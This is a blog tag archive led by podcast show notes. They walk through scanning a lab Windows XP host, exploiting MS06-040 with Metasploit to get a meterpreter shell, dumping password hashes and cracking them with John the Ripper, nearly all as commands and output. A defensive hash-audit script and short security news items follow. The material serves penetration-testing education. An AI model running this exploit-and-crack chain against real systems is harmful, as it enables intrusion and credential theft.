Posts Tagged ‘Hacking’




Episode106 – PaulDotCom Security Weekly

Tech Segment: Probe, Exploit, and Crack for Free

On my Linux box (it could be OS X, but I got errors when I ran nessuscmd under OS X; Ron will be emailing me as soon as he listens to the show :) I run nessuscmd and tell it to OS fingerprint with -O, print out a full report with -V, use plugin ID 22194 (MS06-040), scan TCP ports 139 and 445 with -sS -p139,445, disable safe checks with -U, and test host 192.168.10.139.

root@linux-box:~# /opt/nessus/bin/nessuscmd -O -V -i 22194 -v -sS -p139,445 -U 192.168.10.139

It reports:

Host 192.168.10.139 is up
Discovered open port netbios-ssn (139/tcp) on 192.168.10.139
Discovered open port microsoft-ds (445/tcp) on 192.168.10.139
[i] Plugin 11936 reported a result on port general/tcp of 192.168.10.139
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of 192.168.10.139
+ Results found on 192.168.10.139 :
- Host information :
[i] Plugin ID 11936
| Remote operating system : Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
| Confidence Level : 99
| Method : MSRPC
|
| The remote host is running one of these operating systems :
| Microsoft Windows XP
| Microsoft Windows XP Service Pack 1

- Port netbios-ssn (139/tcp) is open
- Port microsoft-ds (445/tcp) is open
[!] Plugin ID 22194
|
| Synopsis :
|
| Arbitrary code can be executed on the remote host due to a flaw in the
| 'server' service.
|
| Description :
|
| The remote host is vulnerable to a buffer overrun in the 'Server' service
| which may allow an attacker to execute arbitrary code on the remote host
| with the 'System' privileges.
|
| Solution :
|
| Microsoft has released a set of patches for Windows 2000, XP and 2003 :
|
| http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
|
| Risk factor :
|
| Critical / CVSS Base Score : 10.0
| (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
| CVE : CVE-2006-3439
| BID : 19409

Sweet, I love vulnerabilities! They are sexy and exciting, especially MS06-040, because it's just so delicious and begging to be devoured by Metasploit. I have Metasploit 3.1 installed on OS X:

/framework-3.1/trunk gordon$ ./msfconsole


=[ msf v3.2-release
+ -- --=[ 286 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 62 aux

I want to tell metasploit to use the following module:

msf > use windows/smb/ms06_040_netapi

I want to set my payload to a standard meterpreter bind shell, which will let me inject into processes dynamically:

msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

I then tell metasploit what to target:

msf exploit(ms06_040_netapi) > set RHOST 192.168.10.139

Here is what my options look like:

msf exploit(ms06_040_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.10.139   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options:

   Name      Current Setting                                                Required  Description
   ----      ---------------                                                --------  -----------
   DLL       /Users/gordon/framework-3.1/trunk/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
   EXITFUNC  thread                                                         yes       Exit technique: seh, thread, process
   LPORT     4444                                                           yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

Now I tell metasploit to execute my exploit with the above options:

msf exploit(ms06_040_netapi) > exploit

[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.10.50:52375 -> 192.168.10.139:4444)

To access session 1 I use the following command:

msf exploit(ms06_040_netapi) > sessions -i 1

I then tell meterpreter to load the Sam Juicer module:

meterpreter > use -m Sam

Then I issue the "hashdump" command:

meterpreter > hashdump
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

So then I copy and paste those results into a file in my other directory, where John the Ripper is installed:

paimei:~/downloads/john-1.7.0.2/run gordon$ cat > hashes.txt
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

Then I crack the passwords using the stock dictionary that comes with John:

paimei:~/downloads/john-1.7.0.2/run gordon$ ./john hashes.txt
Loaded 9 password hashes with no different salts (NT LM DES [64/64 BS MMX])
TEAMTED (TeamTed)
(SUPPORT_388945a0)
(Noone)
(Guest)
COM (Administrator:2)
guesses: 5 time: 0:00:00:02 (3) c/s: 11060K trying: TOUSCEL - TOUSMIR
Session aborted

W00t! Now I have remote SYSTEM access to the target, and a username and password to try on other systems in less than 5 minutes. Sweet! I also have something that can be easily scripted and automated for testing my internal network, verifying vulnerabilities, all for free!
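The hashdump output above tells a defender most of what John is about to confirm, before any cracking runs: the LM half aad3b435b51404ee is the DES encryption of seven null bytes, so an LM hash ending in it belongs to a password of seven characters or fewer (which is why TEAMTED fell in two seconds), a whole LM field of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored, and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password. The following audit script is an added example written for this page, not code from the PaulDotCom segment, Metasploit or John; it reads pwdump-format lines like the ones shown, flags blank passwords and accounts that still have an LM hash stored (the ones to fix with the NoLMHash policy and a password change), and treats the show's "EDIT" redactions as unknown. The sample input is constructed from the lines published above.

```python
"""Audit pwdump-style hash lines (the format meterpreter's hashdump prints)
for weak password storage.  Added example, not code from the show notes,
Metasploit or John the Ripper; runs offline on the constructed sample below."""

# Well-known constants: one empty LM half (DES of seven null bytes), the
# LM field when no LM hash is stored, and the NT hash of an empty password.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample: the first three lines are redacted the way the show
# notes redact them ("EDIT"); the remaining values are the published ones.
SAMPLE_HASHDUMP = """\
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::
"""


def parse_pwdump(text):
    """Yield (user, rid, lm, nt) for each well-formed user:rid:lm:nt::: line."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[0]:
            continue  # blank or malformed line
        yield parts[0], parts[1], parts[2].lower(), parts[3].lower()


def audit_account(user, rid, lm, nt):
    """Return the list of findings for one account (empty list = nothing to flag)."""
    if lm == "edit" or nt == "edit":
        return ["redacted"]
    if len(lm) != 32 or len(nt) != 32:
        return ["malformed hash"]
    if lm == EMPTY_LM and nt == EMPTY_NT:
        return ["blank password"]
    findings = []
    if lm != EMPTY_LM:
        # Any stored LM hash is crackable quickly: case-insensitive, two
        # independent 7-character DES halves.
        findings.append("LM hash stored")
        if lm[16:] == EMPTY_LM_HALF:
            findings.append("password is 7 characters or fewer")
    else:
        findings.append("NT hash only")
    return findings


def audit_hashdump(text):
    """Map each account name to its findings."""
    return {user: audit_account(user, rid, lm, nt)
            for user, rid, lm, nt in parse_pwdump(text)}


def accounts_needing_action(report):
    """Accounts to remediate: blank passwords or any LM hash still stored."""
    return sorted(user for user, findings in report.items()
                  if "blank password" in findings or "LM hash stored" in findings)


if __name__ == "__main__":
    report = audit_hashdump(SAMPLE_HASHDUMP)
    for user, findings in report.items():
        print(f"{user:18s} {', '.join(findings)}")
    print("remediate:", accounts_needing_action(report))
```

Run against the published lines it reports Noone as a blank password, TeamTed as an LM hash of seven characters or fewer, and SUPPORT_388945a0 as NT-only; the three redacted accounts are listed as unknown rather than guessed at.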


Mar 7



If you are interested in learning something about IT security, hacking or vulnerability exploitation, this is the right place to start. On this page I have put more than 200 papers and links to more than 100 books on this topic.



Feb 8



Peps,

I have been trying to get a full list of the speakers of DefCon 15 in mp3 but have not found much, just the odd file here and there.

This morning as I was loading up my TomTom 910 for the day ahead, I came across a site which claims to be the Official Defcon 15 Recordings Site.

These files are all hosted on defcon.org and you can subscribe to them as Podcasts.

DefCon 15 Audio in MP3
DefCon 15 Video in MP4

Right, back to the geek lab to have a play with what I have picked up today.

Enjoy

EH


Dec 31


 

Web designer David Airey has succeeded in recovering his domain after hackers exploited flaws in Gmail to trick his hosts into authorising a fraudulent transfer.

Airey’s woes began when he took his girlfriend for a month-long holiday to India on 21 November, a trip he mentioned in his blog. The holiday was a break from work and he only occasionally checked his emails.

All seemed well until shortly before his return when Airey received an email from a friend informing him that his website, Davidairey.com, had "disappeared".

At first Airey thought he’d made a mistake and allowed his domain name to expire and a domain poacher had snapped it up before he got the chance to renew it. Subsequent digging revealed a darker truth: hackers had posted a bogus transfer request on his web host support panel the day Airey left for India.

This, alongside an attack on a Gmail account run by Airey, allowed them to seize his domain and hold it for ransom. Initially crooks demanded $650 before dropping their offer down to $250.

Airey’s host, ICDSoft, were unable to reverse the transfer. The transfer request was initially sent to Airey’s Gmail account but forwarded to crooks after they used an exploit to forward the email to a third-party account. Gmail has since fixed the flaw but Airey says that users would still be wise to check their account settings to verify that they too haven’t been hit by the hack.

Recovering the domain through legal action would eat up far more in lawyer’s fees, perhaps a minimum of $1,500, and might take months. During that time Airey would also lose passing trade that the domain brought in. In the meantime Airey has established an alternative Davidairey.co.uk website.

Gmail exploit aids domain hijack




A keylogger on the computer of the Carson, Calif., treasurer enabled online thieves to transfer nearly half a million dollars to other bank accounts, according to news reports.

The thieves made two transfers: The first on May 23 for $90,000 and the next for $358,000 on the following day, according to a report in the Los Angeles Times. Carson Treasurer Karen Avilla noticed the transfers on May 24 and, with the help of the town’s bank, froze all but $45,000 of the money. A computer forensics team from the bank found a Trojan horse on her city-issued laptop, according to a report in ComputerWorld.
